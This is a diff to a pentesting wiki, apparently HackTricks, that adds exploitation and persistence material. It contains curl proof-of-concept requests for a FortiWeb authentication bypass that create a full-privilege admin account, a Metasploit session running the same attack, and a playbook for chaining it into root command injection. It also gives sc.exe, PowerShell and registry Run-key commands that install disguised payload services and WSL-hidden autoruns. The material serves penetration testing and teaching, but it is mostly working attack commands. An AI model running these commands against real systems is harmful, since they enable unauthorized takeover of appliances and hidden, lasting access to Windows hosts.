Metasploit Wrap-Up 11/21/2025

src/network-services-pentesting/pentesting-web/fortinet-fortiweb.md

@@ -27,7 +27,7 @@ FortiWeb 8.0.2 returns HTTP 403 for the traversal probe below.
 
 ```http
 GET /api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi HTTP/1.1
-Host: <target>
+Host: TARGET
 ```
 
 - Interpretation: HTTP 200 → likely vulnerable; HTTP 403 → patched.
@@ -64,15 +64,15 @@ eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb201OiAicm9v
 
 1) Reach `/cgi-bin/fwbcgi` via an API-prefix traversal.
 2) Provide any valid JSON body (e.g., `{}`) to satisfy the input check.
-3) Send header `CGIINFO: <base64(json)>` where the JSON defines the target identity.
+3) Send header `CGIINFO: BASE64_JSON` where the JSON defines the target identity.
 4) POST the backend JSON expected by `fwbcgi` to perform privileged actions (e.g., create an admin user for persistence).
 
 ### Minimal cURL PoC
 
 - Probe traversal exposure:
 
 ```bash
-curl -ik 'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'
+curl -ik 'https://TARGET/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'
 ```
 
 - Impersonate admin and create a new local admin user:
@@ -86,13 +86,38 @@ curl -ik \
   -H 'Content-Type: application/json' \
   -X POST \
   --data '{"data":{"name":"watchTowr","access-profile":"prof_admin","access-profile_val":"0","trusthostv4":"0.0.0.0/0","trusthostv6":"::/0","type":"local-user","type_val":"0","password":"P@ssw0rd!"}}' \
-  'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'
+  'https://TARGET/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'
 ```
 
 Notes:
-- Any valid JSON body suffices (e.g., `{}`) if `/var/log/inputcheck/<path>.json` does not exist.
+- Any valid JSON body suffices (e.g., `{}`) if `/var/log/inputcheck/PATH.json` does not exist.
 - The action schema is FortiWeb-internal; the example above adds a local admin with full privileges.
 
+## Automating the bypass and chaining into CVE-2025-58034
+
+Metasploit 6.4.99 ships with `admin/http/fortinet_fortiweb_create_admin`, which reproduces the HTTP traversal + WebSocket CLI sequence from Defused's PoC. The module reaches `/cgi-bin/fwbcgi`, pushes the crafted `CGIINFO` header, and invokes the internal RPC that provisions a local administrator without presenting credentials.
+
+Example operator flow:
+
+```text
+msf6 > use admin/http/fortinet_fortiweb_create_admin
+msf6 exploit(admin/http/fortinet_fortiweb_create_admin) > set RHOSTS TARGET
+msf6 exploit(admin/http/fortinet_fortiweb_create_admin) > set SSL true
+msf6 exploit(admin/http/fortinet_fortiweb_create_admin) > set USERNAME netops
+msf6 exploit(admin/http/fortinet_fortiweb_create_admin) > set PASSWORD 'P@ssw0rd!'
+msf6 exploit(admin/http/fortinet_fortiweb_create_admin) > run
+```
+
+Because the module speaks directly to the management WebSocket, the operator obtains GUI+CLI credentials that persist across reboots and policy reloads.
+
+### Auth bypass → root RCE playbook
+
+1. Run the auxiliary module (or the manual `curl` workflow above) to mint an arbitrary admin that belongs to `prof_admin`.
+2. Log in to the FortiWeb Manager UI or WebSocket CLI with those credentials and reach any post-auth surface impacted by CVE-2025-58034 (e.g., maintenance helpers that shell out to the underlying OS).
+3. Inject shell metacharacters or a command chain into the vulnerable parameter. The invoked FortiWeb helper runs as root, so successful exploitation yields full command execution on the appliance.
+
+This is the same sequence that the upcoming Metasploit exploit module will automate: CVE-2025-64446 grants authentication bypass, then CVE-2025-58034 provides the authenticated command injection needed for root-level compromise.
+
 ## Detection
 
 - Requests reaching `/cgi-bin/fwbcgi` via API-prefix paths containing `../` (e.g., `/api/v2.0/cmdb/.../../../../../../cgi-bin/fwbcgi`).
@@ -116,5 +141,6 @@ Notes:
 
 - [When the impersonation function gets used to impersonate users — Fortinet FortiWeb auth bypass (watchTowr Labs)](https://labs.watchtowr.com/when-the-impersonation-function-gets-used-to-impersonate-users-fortinet-fortiweb-auth-bypass/)
 - [watchTowr vs FortiWeb Auth Bypass — Detection artefact generator](https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass)
+- [Rapid7 – Metasploit Wrap-Up 11/21/2025](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-21-2025/)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}

src/windows-hardening/windows-local-privilege-escalation/README.md

@@ -739,6 +739,39 @@ Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Ac
 privilege-escalation-with-autorun-binaries.md
 {{#endref}}
 
+### Persistence (service installs + WSL autoruns)
+
+Metasploit 6.4.99 added two persistence modules that encapsulate common tradecraft for keeping Windows access after an initial foothold: `windows/persistence/service` (now powered by a dedicated mixin) and `windows/persistence/wsl/registry`. Even without Metasploit, the same primitives are easy to reproduce manually and pair well with the autorun paths listed above.
+
+#### Service-based persistence via PowerShell/sc.exe
+
+1. Drop or stage the payload (EXE, PowerShell stager, `cmd.exe /c wscript ...`, etc.) into a path writable by the current integrity level.
+2. Create a service whose `ImagePath` points to that payload. The Metasploit module can now do this with either native PowerShell cmdlets or classic `sc.exe` invocations:
+
+```powershell
+# PowerShell backend
+New-Service -Name "WinTelemetrySvc" -BinaryPathName "C:\ProgramData\winsvc\beacon.exe" -StartupType Automatic -Description "Telemetry";
+Set-Service -Name "WinTelemetrySvc" -Status Running
+
+# sc.exe backend
+sc.exe create WinTelemetrySvc binPath= "cmd.exe /c C:\ProgramData\winsvc\payload.exe" start= auto DisplayName= "Windows Telemetry";
+sc.exe failure WinTelemetrySvc reset= 60 actions= restart/0/restart/0
+```
+
+3. Trigger the service once (or rely on `start= auto`) and optionally set recovery actions so SCM re-launches it after crashes.
+
+#### WSL-backed Run/RunOnce persistence
+
+`windows/persistence/wsl/registry` writes `Run/RunOnce` entries that execute `wsl.exe` so the real payload can live inside a Linux distribution (e.g., `~/.local/bin/revshell`). This hides the tooling inside the EXT4 VHDX while only exposing a short `wsl.exe -d DISTRO` command in the registry. Manual setup looks like this:
+
+```cmd
+reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WSLUpdater /t REG_SZ /d "wsl.exe -d Ubuntu-22.04 /home/user/payload.sh" /f
+reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SystemWSL /t REG_SZ /d "wsl.exe -d Ubuntu-22.04 /home/root/systemd-run /root/payload.sh" /f
+```
+
+- `HKCU` entries fire at the next logon of the compromised user.
+- `HKLM` entries (if writable) execute at boot under SYSTEM, giving the attacker code execution before interactive logons.
+
 ### Drivers
 
 Look for possible **third party weird/vulnerable** drivers
@@ -1890,5 +1923,6 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the
 - [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html)
 
 - [Check Point Research – Chasing the Silver Fox: Cat & Mouse in Kernel Shadows](https://research.checkpoint.com/2025/silver-fox-apt-vulnerable-drivers/)
+- [Rapid7 – Metasploit Wrap-Up 11/21/2025](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-21-2025/)
 
 {{#include ../../banners/hacktricks-training.md}}